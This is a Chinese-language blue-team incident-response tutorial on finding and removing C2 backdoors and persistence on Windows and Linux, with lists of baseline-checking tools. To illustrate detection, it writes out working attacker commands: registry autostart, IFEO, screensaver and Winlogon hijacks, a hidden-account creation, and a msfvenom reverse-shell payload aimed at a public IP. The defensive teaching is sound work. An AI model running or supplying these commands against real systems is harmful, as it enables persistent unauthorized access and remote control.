蓝队技能-应急响应篇C2后门权限维持手法WindowsLinux基线检查排查封锁清理

知识点

1、应急响应-C2后门-排查&封锁
2、应急响应-权限维持-排查&清理
3、应急响应-基线检测-整改&排查

演示案例-蓝队技能-C2后门&权限维持-基线检查&查杀封锁-Windows

1、常规C2后门-分析检测

无隐匿手法

也可以把怀疑的exe程序上传到沙箱上分析

有隐匿手法

CDN，云函数，中转等（涉及溯源和反制）

处置手段

清除：删除文件

封锁：防火墙都有出入站规则，需要自己判断在哪里设置封锁策略
1、防火墙阻止程序
(一般没啥用，变个文件名就不行了)

2、防火墙阻止网络链接-IP

2、权限维持技术-分析检测

自启动测试

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "backdoor" /t REG_SZ /F /D "C:\shell.exe" //把shell.exe放入启动项并命名为backdoor

隐藏账户

net user xiaodi$ xiaodi!@#X123 /add

可以使用PCHunter工具查看当前系统用户

或者

运行-lusrmgr.msc-本地用户和组-用户

映像劫持

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe /c c:/shell.exe"

可以使用PCHunter或者火绒剑工具查看

屏保&登录

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "C:\shell.exe" /f //进入锁屏后会触发shell.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D "C:\shell.exe" //有人登录这台计算机的时候就会触发shell.exe

3、Rookit后门-分析检测

后续讲到

4、Web的内存马-分析检测

后续讲到

5、基线检测配合分析项目

Golin

WindowsBaselineAssistant

d-eyes

FindAll

演示案例-蓝队技能-C2后门&权限维持-基线检查&查杀封锁-Linux

1、常规C2后门-分析检测

无隐匿手法

常规后门：

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=7777 -f elf >shell.elf

netstat -anpt

有隐匿手法

CDN，云函数，中转等（涉及溯源和反制）

处置手段

删除文件，防火墙阻止程序或IP域名等

2、权限维持技术-分析检测

GScan

Golin

d-eyes

Whoamifuck

Ashro_linux

linuxcheckshoot

3、Rookit后门-分析检测

后续讲到

4、Web的内存马-分析检测

后续讲到